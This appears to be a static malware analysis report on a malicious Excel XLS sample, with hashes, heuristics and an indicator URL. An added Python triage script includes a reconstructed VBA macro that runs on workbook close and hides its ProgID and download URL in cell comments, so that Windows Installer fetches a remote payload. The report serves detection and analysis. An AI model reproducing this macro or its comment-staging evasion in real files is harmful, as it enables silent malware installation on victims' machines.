Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 832056e426d4fbfe…

MALICIOUS

Office (OLE) / .XLS

Size: 61.0 KB
Created: 2022-04-08 09:06:33
Authoring application: Microsoft Excel
First seen: 2022-04-09
MD5: 27e575eb7332e80b66a09869e34ea459
SHA-1: 351ec141f5b29a2680508027c203a91d5d256023
SHA-256: 832056e426d4fbfea50daf213aa69a51150050337d0c624781bc201b4d6059bf
Risk score: 62

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an XLS workbook containing VBA macros. Its Workbook_BeforeClose subroutine, which Excel runs automatically when the workbook is closed, iterates over the worksheet comments: a comment containing 'W' is stored in the variable Prog, and a comment containing a colon is later passed as the argument to InstallProduct on the object returned by CreateObject(Prog). The ProgID and the call argument are therefore staged in cell comments instead of appearing as string literals in the macro, so the CreateObject call takes a variable rather than a quoted name, a common way of evading string-based macro detection. InstallProduct is the method name of the Windows Installer COM automation object, so Prog most plausibly resolves to that object's ProgID, and the colon-containing comment is consistent with the embedded URL http://51.79.13.180; the macro is therefore most plausibly intended to fetch and execute a second-stage payload from that address when the document is closed. The report does not quote the comment text, so confirm the ProgID and the full argument by dumping the workbook's comments rather than relying on the decoded macro source alone.
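As an added triage example (not code from the report, the analysis service or oletools), the following Python applies the observations above to olevba-decoded macro text: it flags the auto-execute entry point, a CreateObject call whose argument is a variable rather than a quoted ProgID, iteration over worksheet comments and the InstallProduct call, and then replays the comment-selection rule over a dumped comment list to recover what would actually be passed to CreateObject and InstallProduct. The VBA snippet and the comment list are constructed for the example; the WindowsInstaller.Installer ProgID is an assumption, since the report does not quote the comment text.

```python
"""Triage of olevba-decoded VBA source whose CreateObject ProgID and call
argument are staged in worksheet comments rather than in string literals.
Added example; not part of the report, the analysis service or oletools."""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample input: a minimal macro written to match the behaviour
# the report describes. It is NOT the carved macros.bas of the sample.
SAMPLE_VBA = r'''
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    Dim c As Comment, Prog As String
    For Each c In ActiveSheet.Comments
        If InStr(c.Text, "W") > 0 Then Prog = c.Text
    Next c
    For Each c In ActiveSheet.Comments
        If InStr(c.Text, ":") > 0 Then CreateObject(Prog).InstallProduct c.Text
    Next c
End Sub
'''

# Constructed worksheet comments as an analyst would dump them. The report
# does not quote the real comment text; "WindowsInstaller.Installer" is an
# assumption, chosen because InstallProduct is that COM object's method.
SAMPLE_COMMENTS = [
    "Q2 totals reviewed",
    "WindowsInstaller.Installer",
    "http://51.79.13.180",
]

AUTOEXEC = re.compile(
    r"\b(Workbook_Open|Workbook_BeforeClose|Auto_Open|Auto_Close|"
    r"Document_Open|Document_Close)\b", re.I)
# CreateObject with a quoted ProgID vs. CreateObject on a variable/expression
CREATEOBJ_LITERAL = re.compile(r'CreateObject\s*\(\s*"([^"]*)"', re.I)
CREATEOBJ_INDIRECT = re.compile(r"CreateObject\s*\(\s*([A-Za-z_]\w*(?:\.\w+)*)\s*\)", re.I)
COMMENT_ITER = re.compile(r"\bFor\s+Each\s+\w+\s+In\s+\S*\bComments\b", re.I)
INSTALLPRODUCT = re.compile(r"\.InstallProduct\b", re.I)
URL = re.compile(r"https?://[^\s\"'<>]+", re.I)


def triage(vba: str) -> Dict[str, object]:
    """Collect the indicators that matter for this comment-staging pattern."""
    indirect = [m.group(1) for m in CREATEOBJ_INDIRECT.finditer(vba)]
    result: Dict[str, object] = {
        "autoexec": sorted({m.group(1) for m in AUTOEXEC.finditer(vba)}),
        "createobject_literal": CREATEOBJ_LITERAL.findall(vba),
        "createobject_indirect": indirect,
        "comment_iteration": bool(COMMENT_ITER.search(vba)),
        "installproduct": bool(INSTALLPRODUCT.search(vba)),
        "urls": URL.findall(vba),
    }
    # The tell: CreateObject takes a variable AND the macro walks comments,
    # so the ProgID (and any URL) live outside the macro source.
    result["comment_staged_progid"] = bool(indirect) and result["comment_iteration"]
    return result


def resolve_comment_indirection(comments: List[str]) -> Tuple[Optional[str], List[str]]:
    """Replay the selection rule of SAMPLE_VBA over dumped comments: the last
    comment containing 'W' becomes the ProgID (VBA InStr is case-sensitive
    by default), and every comment containing ':' is passed to InstallProduct."""
    prog: Optional[str] = None
    for text in comments:
        if "W" in text:
            prog = text
    args = [text for text in comments if ":" in text]
    return prog, args


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
    print("resolved call:", resolve_comment_indirection(SAMPLE_COMMENTS))
```

The output makes the practical point: the URL is absent from the macro source, so grepping macros.bas alone would miss it; the workbook's comments (or the EMBEDDED_URL extraction) have to be examined alongside the decoded VBA.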

Heuristics (3)

  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA macros detected [medium] OLE_VBA_MACROS
    Document contains VBA macro code
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://51.79.13.180

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                               Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)  1070 bytes
            SHA-256: 621d7d0991c51925900830faa77c5890fc50568382fade01e948be0f6b6cf33f